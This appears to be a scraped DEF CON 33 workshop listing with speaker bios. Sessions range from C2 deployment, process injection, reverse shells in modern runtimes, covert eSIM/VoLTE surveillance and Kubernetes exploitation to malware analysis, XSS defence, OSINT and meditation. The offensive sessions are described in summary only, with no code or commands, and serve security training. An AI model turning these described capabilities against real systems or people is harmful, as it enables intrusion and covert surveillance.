and attack surface management.

In this workshop we will start from scratch with nothing more than a GCP project. The only requirement to participate in this workshop is a laptop with an internet connection. We will deploy a virtual machine, install and configure the Mythic C2 Server. We will deploy a virtual machine, deploy and configure the Nemesis offensive data enrichment pipeline and operator support system. We will deploy a mythic-connector to send data automatically from Mythic to Nemesis. We will compromise a vulnerable application and deploy a Mythic C2 agent to said application, then exfiltrate data. We will clone my custom fork of RAGnarok locally and process said data from Nemesis using local, offline AI LLM models. (This can also be done in the cloud but I won’t be providing cloud GPU instances for obvious reasons.) We will then use the insights from this data to compromise another more secure host.

I have been Red Teaming for 4 years with an academic background in AI/ML.

I am on the Red Team for Palo Alto Networks. I lead the development, automation, and AI efforts for the team.

“Why can’t we just drone strike the ransomware operators in Russia?” “Can’t you just hack the threat actor’s servers and get our data back?” “If we don’t know about the fraud, we’re not legally responsible for it, right?” – Real Stroz Friedberg Client Questions, including one from CEO of a Fortune500 company

John and Heidi will lead an interactive, dynamic, and entertaining incident response tabletop session based on their years of experience and working on hundreds of incident responses together. They will walk through the details of a typical ransomware attack, while highlighting the legal frameworks and decision points that arise throughout the lifecycle of the investigation. From payment to OFAC-listed threat actors, to SEC disclosure rules, to that pesky CFAA, participants will be asked to engage at each inject. Participants will gain a deeper appreciation for the multitude of tradeoffs and difficult decisions business, technical, and legal stakeholders must make during an incident while operating within various legal and regulatory frameworks. Together, the presenters and participants will explore the potential ethical and policy positions that could alter or enhance the way incident response is handled in the future.

Heidi L. Wachs is Managing Director, Engagement Management, and head of the Washington, D.C. office of Stroz Friedberg, where she helps clients prepare for and respond to data breach and cybersecurity incidents and develop and implement data privacy and information security programs. Ms. Wachs oversees complex investigations involving the collection, use, and sharing of data and personal information, in particular through the use of APIs, scraping, hacking, cookies, and other third-party web page integrations. Ms. Wachs’ experience includes serving as a technical analyst and Chief Privacy Officer for a leading national research university. Ms. Wachs earned her B.A. in Journalism from Lehigh University and her J.D. from the Benjamin N. Cardozo School of Law. She is admitted to the bars of the District of Columbia and the United States Supreme Court.

John W. Ailes, VI is a DFIR Manager at Stroz Friedberg, where he leads and supports technical investigations into economically motivated cybercrime, state sponsored intrusion, and other forms of complex digital investigation. Mr. Ailes holds GIAC Certified Forensic Analyst, GIAC Certified Forensic Examiner, and GIAC Certified Reverse Engineering Malware certifications from the SANS institute and a B.S. in Cyber Security Engineering from George Mason University.

Nathan Salminen is a cybersecurity lawyer at Hogan Lovells where he has helped clients prepare for and respond to hundreds of cybersecurity incidents, ranging from everyday business email compromises to massive data breaches and incursions by nation-state threat actors into companies in the financial or energy sectors. Before becoming a lawyer, Nathan worked as a software engineer and manager of technical teams for 13 years and completed the OSCP certification.

Enigma was the infamous German encryption machines that was used in World War 2. A group of British cryptographers successfully broke the sophisticated machine, and in doing so, gave rise to modern adversarial cryptography and the Turing Machine, which would later evolve into the computer. In this workshop, we will look at how adversarial cryptography initially formed and how many of the techniques used still apply today. Additionally, many of the mathematical principles used in both the construction of the Enigma machine and its subsequent breaking are used heavily in modern encryption, which directly relate to the technology used in cryptocurrency.

Rigo Salazar is a Gen Z who is a Millennial in spirit with a Master’s degree in Mathematics and a Bachelor’s in Civil Engineering… for some reason. Jigsaw puzzles, puppetry, and platforming are a handful of his hobbies, but his true loves are his family, friends, and prime numbers. With boisterous whimsy and the volume to match, Rigo is so excited for his second Defcon and the opportunity to talk about cryptography.

Luke Szramowski is a mathematical researcher, with a Bachelor’s Degree in Mathematics and two Master’s Degrees, one in Math, with a focus in Number Theory and another in Math with a focus in Coding Theory. In his free time, Luke works on a litany of different math problems, mainly regarding Number Theoretic conjectures and playing all different types of games. He is very excited to talk about any cryptography related questions and is looking forward to his first DEF CON.

The Linux operating system is a gateway to accomplishing numerous tasks in our hacking community; whether it is writing code in dozens of languages for free or using any manner of commands and tools for any task. While Linux is phenomenally powerful for many, it can be intimidating to persons who have not used it. We want to remove the intimidation. In this talk we describe what is Linux, we go over some key elements that we encounter in using it, and we compare some Linux elements with Microsoft Windows.

D.J. Davis started his academic and work life on IBM mainframes and midrange systems in Operations and Development. After a decade of Development, he has worked in Systems Engineering, Network Engineering, WAN Design Enginering, IT Integration, Telecom Sustaining Engineering, and Information Security. D.J. holds a BS and MS in Business, Information Systems. He works in the Washington DC area.

Dive into the dynamic world of Open Source Intelligence (OSINT) with this quick workshop designed to give you a taste of practical online investigations and threat hunting. Led by a seasoned professional, this immersive session offers a condensed yet impactful introduction to essential OSINT techniques that you can use in your red teaming engagements.

Experience the power of hands-on learning as you engage in live demonstrations, exploring key concepts such as operational security (OpSec), advanced search engine queries, username and phone number lookups, social media reconnaissance, breached records analysis, network reconnaissance, historical records, and essential documentation, all within the span of this engaging workshop. Through interactive exercises and guided discussions, participants will gain a glimpse into the world of OSINT.

Who’s it for?

This training is suited for all individuals in any field with a keen interest in online investigations regardless of their experience level in OSINT

Mishaal is a subject matter expert in cybersecurity, pentesting, privacy, Open Source Intelligence and social engineering and a frequent speaker on these topics at Universities and popular cybersecurity conferences like DEF CON, Black Hat, Wild West Hackin Fest, TEDx, and multiple BSides Security events.

Mishaal has worked with multinational companies for over 20 years, securing their networks and providing executive level consultancy as a CISO to manage risk and avoid breaches. He’s the author of the book; The Phantom CISO, runs a cybersecurity practice as a vCISO and owns a privacy management and investigations firm.

This talk dives into how Artificial Intelligence (AI) combined with Model Context Protocol (MCP) can revolutionize external attack surface testing. Attendees will learn repeatable, low-effort techniques to identify exposed assets, prioritize risks, and automate vulnerability discovery using AI-driven insights.

Shane Krause is a 25-year-old cybersecurity professional who broke into offensive security two years ago, fueled by a lifelong passion for technology and problem-solving. As a penetration tester, Shane Krause enjoys identifying vulnerabilities, simulating real-world attacks, and helping organizations strengthen their defenses. Outside of work, Shane Krause is an avid gamer who values connecting with others in the cybersecurity community and sharing knowledge to grow together in the field.

As Macs continue to gain popularity, the volume and sophistication of malware targeting Apple’s desktop platform is also on the rise. This hands-on introductory workshop is designed for anyone curious about how macOS malware works and how to effectively analyze it. Led by Mac security expert and author Patrick Wardle, the session covers the fundamentals of macOS malware analysis. You’ll examine real-world threats to understand how they function under the hood and learn to use simple yet powerful tools to dissect these malicious programs.

No prior experience with macOS malware is required. Whether you’re a student, a security enthusiast, or just getting started in the field, this workshop will provide a solid foundation and the practical skills needed to begin analyzing threats and thinking like a Mac defender.

Patrick Wardle is the founder of the Objective-See Foundation, the CEO/Cofounder of DoubleYou, and the author of “The Art of Mac Malware” book series. Having worked at NASA and the NSA, as well as presenting at countless security conferences, he is intimately familiar with aliens, spies, and talking nerdy. Passionate about macOS security, Patrick spends his days discovering Apple 0days, studying macOS malware, and releasing free open-source security tools to protect Mac users.

Deep dive into Android’s eSIM management APIs and how they can be abused.

Building and analyzing a proof-of-concept malware for silent eSIM installation and location harvesting.

Understanding telecom backend provisioning vulnerabilities enabling malicious profile injection.

Detection techniques, anomaly signals, and defensive engineering against malicious SIM profile abuse.

Live demonstration on extracting call metadata and geolocation from compromised profiles without raising alarms.

Ready to multiclass from D&D player to educational game master?

This hands-on train-the-trainer workshop teaches experienced tabletop gamers the specialized skills needed to facilitate epic learning sessions using the Malware & Monsters framework.

Through guided gameplay with pre-built characters and comprehensive facilitator guides, you’ll master advanced IM techniques for educational environments—from managing player dynamics to controlling session flow and handling those inevitable “but what if I cast fireball?” moments in a learning context.

No cybersecurity teaching experience required; we’re focusing purely on leveling up your facilitation skills.

Earn your “official” Incident Master license and walk away with a complete facilitator toolkit, proven techniques, and the confidence to run engaging educational gaming sessions that would make even the most veteran DM proud.

Glen Sorensen is a Virtual Chief Information Security Officer (vCISO) and Managing Director with Cyber Risk Opportunities. He has worn numerous hats in his career, in areas such as security engineering and architecture, security operations, GRC, and leadership. He has held a variety of roles as an analyst, engineer, consultant, auditor, regulator, and information security officer for a financial institution.

Glen approaches problems with practical solutions that bring good business value and has worked across many sectors, including financial services, healthcare, manufacturing, and others. He has served as a consulting expert in a large legal case involving healthcare and cyber attack detection technology. He has been in IT and security for 15+ years, longer if you count years of misspent youth bending technology and countless hours of roleplaying games. He is a sucker for a good tabletop exercise and serves as an Incident Master for HackBack Gaming, the fun kind of TTX.

This Workshop delves deep into the intricate structures of PDF files, offering a meticulous analysis of each segment. Unveiling the covert strategies of threat actors, we explore how they ingeniously incorporate malicious components into file structures. The session elucidates the meticulous collection of IOCs (Indicators of Compromise) and the construction of IOAs (Indicators of Attack) for behavioral analysis, empowering defenders to anticipate and thwart novel attack vectors. Our technical journey navigates through the PDF file’s anatomy, encompassing headers, bodies, cross-reference tables, and trailers. Live demonstrations dissect malicious PDFs using tools like pdfid, pdf-parser, and pdftk, providing hands-on insights into the analysis process. The presentation unravels encoding techniques and exposes threat actors’ methodologies in establishing Command and Control (C&C) channels within PDF files. The session concludes with an opportunity for questions, equipping participants with advanced knowledge for robust malware analysis and proactive defense strategies.

I’ve been working as Head of Identity Threat Labs and Global Product Advocate at Segura®, Red Team Village Director, Senior Advisor Raices Cyber Academy, Founder of Red Team Community (Brazil and LATAM), AWS Community Builder, Snyk Ambassador, Application Security Specialist and Hacking is NOT a crime Advocate. International Speaker at Security and New technologies events in many countries such as US (Black Hat & Defcon), Canada, France, Spain, Germany, Poland, Black Hat MEA – Middle-East – and others, I’ve served as University Professor in Graduation and MBA courses at Brazilian colleges, in addition, I’m Creator and Instructor of the Course – Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers(PentestMagazine) and Malware Analysis – Fundamentals (HackerSec).

Join us for an in-depth exploration of how PDFs, a ubiquitous document format, can be exploited as a vessel for executing malicious JavaScript malware. This presentation will delve into real-world vulnerability that have been targeted to execute harmful code within PDF files—posing a serious threat in today’s cybersecurity landscape.

Key exploit techniques we’ll explore include:

Heap Spray Attacks: Using shellcode to strategically overwrite memory, thereby enabling attackers to execute arbitrary code and gain control over target systems.

Data Exfiltration Tactics: Methods for covertly extracting critical information, such as email addresses and system details, from users without their knowledge or consent. Embedding Malware in PDFs: An examination of how attackers embed harmful scripts into PDFs, tricking users into activating exploits within Adobe Reader through seemingly ordinary actions.

We’ll dissect malicious actions such as shellcode injection, buffer overflow attacks, Adobe Reader exploit, and memory manipulation, all designed to execute malware effectively.

This session is perfect for offensive security professionals seeking to deepen their understanding of PDF-based exploits and enhance their penetration testing and threat emulation capabilities. Discover how these sophisticated threats operate and learn strategies to counteract them within your security frameworks. Join us to stay ahead in the ever-evolving world of cyber threats.

More information about the presentation you can find in this article – https://labs.senhasegura.blog/unmasking-the-threat-a-deep-dive-into-the-pdf-malicious-2/

I’ve been working as Head of Identity Threat Labs and Global Product Advocate at Segura®, Red Team Village Director, Senior Advisor Raices Cyber Academy, Founder of Red Team Community (Brazil and LATAM), AWS Community Builder, Snyk Ambassador, Application Security Specialist and Hacking is NOT a crime Advocate. International Speaker at Security and New technologies events in many countries such as US (Black Hat & Defcon), Canada, France, Spain, Germany, Poland, Black Hat MEA – Middle-East – and others, I’ve served as University Professor in Graduation and MBA courses at Brazilian colleges, in addition, I’m Creator and Instructor of the Course – Malware Attack Types with Kill Chain Methodology (PentestMagazine), PowerShell and Windows for Red Teamers(PentestMagazine) and Malware Analysis – Fundamentals (HackerSec).

Cross-site scripting (XSS) remains a critical threat to web applications. This intensive, hands-on training session moves beyond theory to empower you to transform your web application codebase into a bastion of security, adhering to the rigorous standards pioneered at Google. We will equip you with the practical skills and tools to implement a defense-in-depth strategy, aiming for a future where XSS is a mitigated threat.

n this workshop, you won’t just hear about solutions; you’ll actively implement them. We will guide you through the step-by-step deployment of Google’s most effective runtime protections against XSS—strict Content Security Policy and Trusted Types—drawing from our experience rolling these out across hundreds of products serving billions of users. You’ll learn to integrate these with powerful compile-time protections to create a comprehensive security posture.

Aaron is a Senior Software Engineer at Google working on product security across all of Google’s user facing webapps. Bridging the gap between security and development work, he has worked on product teams at both Google and Microsoft in the past, including Docs, GCP, and Visual Studio. He is extremely passionate about the developer experience and committed to empowering every dev to build the most secure and delightful products.

Mayra Robles is a Software Engineer on Google’s Information Security team. She specializes in web security and the protection of agentic systems. As an intern, she focused on making Trusted Types more user-friendly, debuggable, and easier to deploy at scale. Before focusing on security, she completed two internships at Microsoft, where she worked on user-facing features and pioneered workflows for AI-powered productivity interactions in the Edge browser. A native of Ciudad Juarez, Mexico, and a graduate of the University of Texas at El Paso, Mayra now lives in New York City and enjoys the local theater scene.

A great badge needs a great workshop on how to make the most of it. MHV’s badge for DC33 is an open-source embedded system for maritime security research, featuring interfaces for NMEA2000, NMEA0183, Modbus RTU, and CAN bus with unprecedented symbol-level CAN fault injection capabilities. Join us for a technical workshop on how to use the badge to hack on maritime systems!

The rapid advancement of large language models (LLMs) is reshaping the landscape of cybersecurity. These models are not only achieving higher benchmarks in math, coding, and cybersecurity tasks but are also being leveraged by threat actors to enhance resource development and social engineering capabilities. As LLMs continue to evolve, what could autonomous cyber capabilities powered by these models look like? How can we responsibly harness their potential for adversary emulation and defense? In this talk, we will explore the integration of LLMs into MITRE Caldera, a scalable automated adversary emulation platform, and investigate how these models can transform adversary emulation through three distinct paradigms: as planners, as factories for constructing custom cyber abilities, and as forward-deployed autonomous agents. Drawing on existing research, including papers on LLM-assisted malware development and benchmarks for offensive cyber operations, we will examine the capabilities of LLMs in generating plausible emulations of advanced persistent threats (APTs).

The session will feature live demonstrations showcasing how LLMs can replicate adversary profiles, construct new cyber abilities on the fly, and autonomously execute emulation tasks. Attendees will gain insights into the performance of these paradigms, their implications for purple teaming, and the challenges of maintaining realistic emulations. Finally, we will look ahead to the future of adversary emulation, discussing how APTs might leverage autonomous or semi-autonomous LLM capabilities in practice and the role of increasingly powerful models in shaping the next generation of cybersecurity tools. Whether you’re a defender, researcher, or technologist, this talk will provide a compelling glimpse into the possibilities and risks of LLM-enabled adversary emulation.

Ethan Michalak is a cybersecurity engineer and an avid CTF player. Ethan pursues efforts in adversary emulation, detection engineering, and malware development. In his free time, Ethan plays video games, reads a book, or makes a cocktail.

Mark Perry is a Lead Applied Cyber Security Engineer at MITRE Corp, where he specializes in adversary emulation and work development. With a robust background in infrastructure and cyber security frameworks, Mark brings extensive expertise to his role, focusing on fortifying systems against sophisticated cyber threats. He has worked on projects involving adversary emulation, red teaming, cyber threat intelligence, and software development. Mark also leads development and delivery of Caldera workshops, providing participants with practical, hands-on training utilizing cybersecurity techniques. Additionally, he actively promotes Caldera’s benefactor program, fostering community support and engagement to further the development of cybersecurity tools and resources. Outside of his professional endeavors, Mark enjoys traveling and is a supercar enthusiast.

This hands-on workshop introduces ModuleOverride, a novel technique for process injection, enabling the reuse of existing memory sections to inject and execute malicious shellcode within running Windows processes.

Participants will explore key challenges in security research and development, examining how certain constraints in shellcode generation—such as the inability to specify an exit function—can drive creative solutions, like dynamically patching shellcode within an active process during injection.

Attendees will engage in live demonstrations and interactive exercises, gaining first-hand experience as we walk through the final phase of the research, tackling technical hurdles encountered during development to ensure a successful process injection.

We’ll also hold an open discussion on detection strategies, encouraging participants to brainstorm and explore possible ways to identify ModuleOverride.

Alessandro Grisa is a member of CovertSwarm’s Red Team Hive, focusing on malware development and exploring Windows internals. He also has a passion for hardware hacking and enjoys reverse engineering embedded devices. In his spare time, he plays the drums, plays tennis and spends time in the mountains

Red Teamer and offensive security nerd obsessed with AD exploits, privilege escalation, and building custom offensive tooling.

Come join us for morning meditation. This workshop is inclusive of all bodies. EveryBODY is Welcome here. Meditation can help quiet the mind, manage stress, and enhance overall emotional well-being, making it a great way to start the day.

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.

Come join us for morning meditation. This workshop is inclusive of all bodies. EveryBODY is Welcome here. Meditation can help quiet the mind, manage stress, and enhance overall emotional well-being, making it a great way to start the day.

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.

Come join us for morning meditation. This workshop is inclusive of all bodies. EveryBODY is Welcome here. Meditation can help quiet the mind, manage stress, and enhance overall emotional well-being, making it a great way to start the day.

Hi, I’m Megan Allen.

My work focuses on a holistic approach to health; moving the body’s natural energy into alignment with Earth and the seven chakras. I practice integrative wellness – honoring a person’s emotional, mental, physical and spiritual well-being. I provide intuitive healing sessions and work with clients to relax the mind, increase body awareness and balance energy flow.

I also facilitate community wellness workshops, ceremonies and transformational group programs inviting participants to disconnect from their busy lives, turn inward and tap into the present to restore and maintain the body’s energetic balance and cultivate self-love, empowerment and sovereignty.

I inspire people to activate their highest potential in alignment with their wise hearts and to promote healing from within. I tailor my sessions to reflect this; using techniques from my healing disciplines as well as my love for Traditional Chinese Medicine, holistic aromatherapy, crystals and essential oils, tarot, animal medicine cards and a deep reverence for nature.

Nature is one of my greatest teachers. It constantly teaches me about grounding, stability, resilience, boundaries, growth, and stillness.

Nuclei has become a game-changing tool for hackers worldwide, transforming how we discover vulnerabilities and hack at scale. This workshop explores why Nuclei is dominating the bug bounty scene and how it’s evolving the art of automated hacking. We’ll dive into how this open-source powerhouse lets hackers scan thousands of targets, write custom templates, and find bugs that automated scanners miss.

Ben Sadeghipour, better known as NahamSec, is an ethical hacker, content creator, and keynote speaker. Over his career, Ben has uncovered thousands of security vulnerabilities for major organizations, including Amazon, Apple, Zoom, Meta, Google, and the U.S. Department of Defense. As a top-ranked bug bounty hunter, he is deeply passionate about cybersecurity education, regularly sharing his knowledge through his popular YouTube channel and speaking at major conferences like DEFCON and BSides. Beyond his personal achievements, Ben is committed to building the security community, organizing events that foster collaboration, innovation, and the next generation of offensive security professionals.

For over 20 years, Adam has balanced the worlds of application security and web development. He currently serves as the CTO of HackingHub and the Director of BSides Exeter. Over the past five years, he has combined his expertise to create and deliver gamified educational content, aimed at teaching the next generation of ethical hackers and developers about web application security.

Accesses to the blockchain’s state and logs leak highly sensitive information such as the user’s identity, who it is trading with, and which crypto-asset the user is interested in trading. In this tutorial, we will go over two technologies for ensuring access pattern privacy, including Oblivious RAM (ORAM), and Private Information Retrieval (PIR). Unlike traditional encrypted databases that protect only the contents of data, our technologies additionally protect the queries, thus hiding users’ intentions. We will describe two extremely simple constructions, one ORAM, and one PIR scheme. In particular, the ORAM algorithm is also the one used by industry leaders such as Signal and Meta. We will next show a demo for our oblivious key-value store implementation. We will also challenge the learners with a CTF problem that demonstrates how sensitive secrets can easily be leaked even when the memory contents are encrypted.

Elaine Shi is a professor in Carnegie Mellon University. Her research interests include cryptography, security, mechanism design, algorithms, foundations of blockchains, and programming languages. She is a co-founder of Oblivious Labs, Inc. Her research on Oblivious RAM and differentially private algorithms have been adopted by Signal, Meta, and Google. She is a Packard Fellow, a Sloan Fellow, an ACM Fellow, and an IACR Fellow.

Afonso Tinoco is a PhD candidate currently on leave from Carnegie Mellon University and University of Lisbon. His research interests include Applied Cryptography and Distributed System Verification. He is a Co-Founder and a Research Engineer at Oblivious Labs, Inc. (https://obliviouslabs.com). Oblivious Lab’s mission is to develop open-source toolchains for Oblivious Computation (https://github.com/obliviouslabs/), with the goal of accelerating the wide deployment of Oblivious Computations. He is also a co-captain of STT (https://sectt.github.io/) , the CTF team of University of Lisbon.

For years, Pentestmonkey Reverse Shell Cheat Sheet defined the essentials of post-exploitation. Bash, Python, PHP, (G)Awk, Netcat and others were quick, simple and highly effective tools for gaining shell access. Today, those tools are the first to be flagged, restricted or removed. In real-world hardened environments, the old paths are closed. Meanwhile, new runtimes like Clojure, Racket, NATS-IO, Bun, Crystal, Red Language, Ballerina and others are becoming part of production environments, CI/CD pipelines and internal developer ecosystems, usually without security teams treating them as risks.

This workshop focuses on building practical, working reverse and bind shells using these modern runtimes. Participants will write their own payloads, test them live against targets and leave with working knowledge of how to survive without traditional tooling. Every shell demonstrated will be integrated into the Metasploit Framework with custom modules built for each runtime. Source code, victim and attacker virtual machines and pre-built environments will be provided to ensure every participant can practice during the session.

This is not a theory-heavy workshop. It is about operational survival when Python is gone, Netcat is restricted and standard shells are no longer viable. It is about turning runtimes that defenders ignore into reliable offensive footholds. Attendees will leave with ready-to-use payloads, working Metasploit extensions, and the technical knowledge to adapt to modern detection-heavy environments.

With more than 10 years immersed in Information Security, he is an Information Security Engineer specializing in Red Team. His focus extends to best practices, encompassing application and infrastructure vulnerability assessments, code reviews, and a mix of static and dynamic analyzes to identify vulnerabilities. In addition to his main focus, he has a strong inclination to develop offensive tools. He has contributed more than 25 modules to the core Metasploit framework and registered several CVEs. Additionally, his knowledge covers the complex landscape of macOS security. His curiosity leads him to test non-trivial scenarios, from analyzing cranes that operate containers on ships, to delving into the complexities of embedded systems (SCADA/PLC) and executing advanced attacks on computer networks, that is, his hacker spirit runs through his veins. . He really enjoys breaking and fixing things that contain bits and bytes.

How VoLTE and IMS — the backbone of modern telecom voice services — can be weaponized by malware to perform stealthy, operator-blind surveillance, data exfiltration, and persistent command-and-control (C2), all without using the public internet. how a VoLTE-enabled Android device can be turned into a covert surveillance node—no SIM or live network required. Using a rooted emulator (for safe, repeatable testing) and Frida hooks, attendees will watch malware silently hijack the IMS stack, launch SIP INVITE/OPTIONS beacons to a Kamailio-based fake IMS core, and exfiltrate SMS, location, eSIM data or live audio over RTP—all traffic appearing as legitimate VoLTE signaling inside telecom infrastructure. The exercise proves how nation-grade implants can live entirely inside operator voice channels, bypassing traditional firewalls and DPI.

A cross-border health emergency is spreading fast and you’re on the front lines of the response. Hospitals are overwhelmed. ICU beds are full. Strange symptoms are emerging in a tight geographic cluster across southern Germany and eastern France. Supply chains are buckling, communications are failing, and trust in public health institutions is unraveling. ​ At the Biohacking Village during DEF CON 33, Operation Europa Crisis invites you to join a gripping, real-time tabletop challenge. ​ 🧠 Step Into the Crisis Take on roles such as: Hospital administrators Health ministry officials Crisis communication leads Frontline clinical staff Supply chain and logistics coordinators CBRN and incident response team ​ Together, you’ll investigate the cause, coordinate international response efforts, manage conflicting narratives, and navigate critical decisions in a high-pressure environment.

Nathan Case is a cybersecurity engineer and strategist with over two decades of experience defending critical infrastructure, building secure cloud systems, and leading incident response at the highest levels. His career spans roles at Amazon Web Services, McKesson, and defense-focused startups, where he has architected platforms for healthcare, government, and national security missions. Known for his ability to bridge technical depth with real-world impact, Nathan has led global security teams, supported cyber operations across multiple countries, and advised both enterprise executives and government leaders on risk, resilience, and transformation.

In this Workshop, attendees will learn some of the most impactful techniques and tools to increase the value of OSINT to their organizations. A guided learning experience, instructors will immerse attendees in hands-on exercises.

Lee McWhorter, Owner & Chief Geek at McWhorter Technologies, has been involved in IT since his early days and has over 30 years of experience. He is a highly sought after professional who first learned about identifying weaknesses in computer networks, systems, and software when Internet access was achieved using a modem. Lee holds an MBA and more than 20 industry certifications in such areas as System Admin, Networking, Programming, Linux, IoT, and Cybersecurity. His roles have ranged from the server room to the board room, and he has taught for numerous universities, commercial trainers, and nonprofits. Lee works closely with the Dark Arts Village at RSAC, Red Team Village at DEFCON, Texas Cyber Summit, CompTIA, and the CompTIA Instructor Network as a Speaker, SME, and Instructor.

Sandra Stibbards opened her investigation agency, Camelot Investigations, in 1996. Currently, she maintains a private investigator license in the state of California. Sandra specializes in financial fraud investigations, competitive intelligence, counterintelligence, business and corporate espionage, physical penetration tests, online vulnerability assessments, brand protection/IP investigations, corporate due diligence, and Internet investigations. Sandra has conducted investigations internationally in five continents and clients include several Fortune 500 and international companies. Sandra has been providing training seminars and presentations on Open Source Intelligence (OSINT) internationally since 2010 to federal governments and corporations.

The main goal of this booth is to introduce you to Matter, the “”open-source, royalty-free smart home connectivity standard.”” We have designed seven ways for you to discover and play with the Matter technology: – Home Assistant – Apple Home – Google Home -Ubuntu/Linux – macOS – Node.js – Python

Once you are familiar with the basics, solve some challenges and control the IoTrain!

Zoltan (@zh4ck) is a Principal Vulnerability Researcher at CUJO AI, a company focusing on smart home security. Previously he worked as a CTO for an AV Tester company, as an IT Security expert in the financial industry, and as a senior IT security consultant. He is also the developer of the Hardware Firewall Bypass Kernel Driver (HWFWBypass), the Encrypted Browser Exploit Delivery tool (#IRONSQUIRREL) and the Sandbox tester tool to test Malware Analysis Sandboxes, and is partially “responsible” for an IoT botnet infecting 600K devices.

I am a big fan of offsec certs, currently holding OSEP, OSED, OSCE, OSCP, and OSWP.

The barrier to learn how to program PLC using ladder logic is not as high as most people think. There are free tools available and low cost PLC hardware or even free simulators that can be used as well as a wealth of information online. This workshop builds from the successful offering from last year (https://github.com/brienc23/Defcon31_workshop_materials) as part of the Maritime Cyber Petting Zoo. The presenter will bring a minimum of three Allen Bradley micro820 based trainers (https://www.plccable.com/allen-bradley-micro820-analog-ccw-plc-trainer-micro800-training-kit/) with three computers loaded with Rockwell Automation’s Connected Components Workbench (CCW) software. In as little as one hour, participants will be coding on a real PLC and designing a program to control the inputs and outputs (switches and lights) on the trainers. The goal would be to invite more people into this important space of ICS/OT Security by demystifying how PLCs work.

Learn strategies for dealing with the physical, emotional, and logical aspects of nervousness that comes from public speaking. In a short workshop, I will walk participants through a series of quick exercises you can do to feel more relaxed and prepared before speaking about the technical topics that you love. These are adapted from exercises I used to do during Speech & Debate, and I have taught them to many mentees and coworkers with great success. As a hacker and frequent conference speaker, I know that being a confident public speaker opens many doors. Let’s get you up on stage!

Betta Lyon Delsordo began her cyber journey at the age of 13 when she started teaching herself to code. This grew into freelance web development work for small businesses in Montana, where she soon realized she needed to know more about application security to keep her clients safe. She began learning more about secure coding and interned with a hacking firm, and realized she was pretty good at it. After completing a Master’s in Cybersecurity at Georgia Tech, obtaining certifications such as the GPEN, and working her way up through pentesting, Betta is now working as a Lead Application Penetration Tester at OnDefend. Her areas of expertise include application security, secure code review, cloud security, and AI hacking. Betta is very involved in the cybersecurity community and with organizations that support women in technology. She has been a mentor for 9 years with Technovation (an international girls coding program), and is an organizer and speaker for organizations promoting diversity in technology including RTC, WiCyS, WISP, and WSC.

Want to break into reverse engineering but not sure where to start? This session walks you through both software and hardware reverse engineering using an Arduino and Ghidra. We’ll run a simple C script on an Arduino that adds integer and hexadecimal values, updates register values, and toggles an LED. You’ll learn how to inspect this behavior in Ghidra, set breakpoints, and observe what’s happening at a low level. We’ll also dive into the components of the Arduino board—like the ATmega microcontroller—and explore what’s happening on the integrated circuits. No prior reverse engineering experience needed.

Sydney Johns is a cybersecurity researcher with expertise in reverse engineering, AI for cybersecurity, vulnerability assessment, and post-quantum cryptography. Her research focuses on evaluating the security of information systems, improving computer science education, and assessing AI model performance in military decision-making contexts. She brings five years of applied experience supporting the U.S. Army Research Laboratory and the Johns Hopkins University Applied Physics Laboratory.

Sydney is currently pursuing a Ph.D. in Computer Science at Virginia Tech’s Innovation Campus, where she is a GEM Fellow. Outside of her professional work, she enjoys painting, visiting the beach, cooking, and watching anime.

This workshop flips the script on financial security, focusing on a practical, hands-on level where attendees will learn by doing. Attendees will step into the shoes of sophisticated attackers targeting the interconnected financial ecosystem. Guided by us – Chloe, with experience in architecting B2B fraud solutions for acquiring banks in Singapore, and Weihong, with hands-on experience building ML-based KYC/liveness detection and rule-based risk systems for new user onboarding at OKX (a crypto exchange) – participants will learn how to think offensively.

Wei Hong is a machine learning practitioner with six years of experience in natural language processing and applied AI at one of the world’s largest cryptocurrency exchanges. He has contributed to projects involving KYC systems, user risk profiling, and the deployment of AI in real-world financial applications. Fascinated by blockchain development, Wei Hong is particularly interested in the intersection of decentralization, transparency, and machine learning. He is currently pursuing a Master’s in Computer Science at Georgia Tech, where he is an active member of the Blockchain Club@GT.

Chloe is a machine learning engineer and blockchain enthusiast with five years of experience in building ML systems for fraud detection and compliance in the traditional payments and fintech industry. Outside of work, she explores blockchain development with a focus on usability and real-world applications in the payment space. Chloe is an active member of the Georgia Tech Blockchain Club and is particularly interested in how decentralized technologies can improve financial infrastructure and user experience.

Kubernetes is the de facto operating system of the cloud, and more and more organizations are running their workloads on Kubernetes. While Kubernetes offers many benefits, it also introduces new security risks, such as cluster misconfiguration, leaked credentials, cryptojacking, container escapes, and vulnerable clusters.

In this workshop, attendees will learn how to attack Kubernetes clusters by simulating a real-world adversary exploiting one of the most recent vulnerabilities in the ecosystem: IngressNightmare (CVE-2025-1974). Participants will practice exfiltrating service account tokens and credentials, performing lateral movement, escalating privileges by targeting common applications deployed in Kubernetes environments, and ultimately compromising the entire cluster.

Lenin Alevski is a Full Stack Engineer and generalist with a lot of passion for Information Security. Currently working as a Security Engineer at Google. Lenin specializes in building and maintaining Distributed Systems, Application Security and Cloud Security in general. Lenin loves to play CTFs, contributing to open-source and writing about security and privacy on his personal blog https://www.alevsk.com.
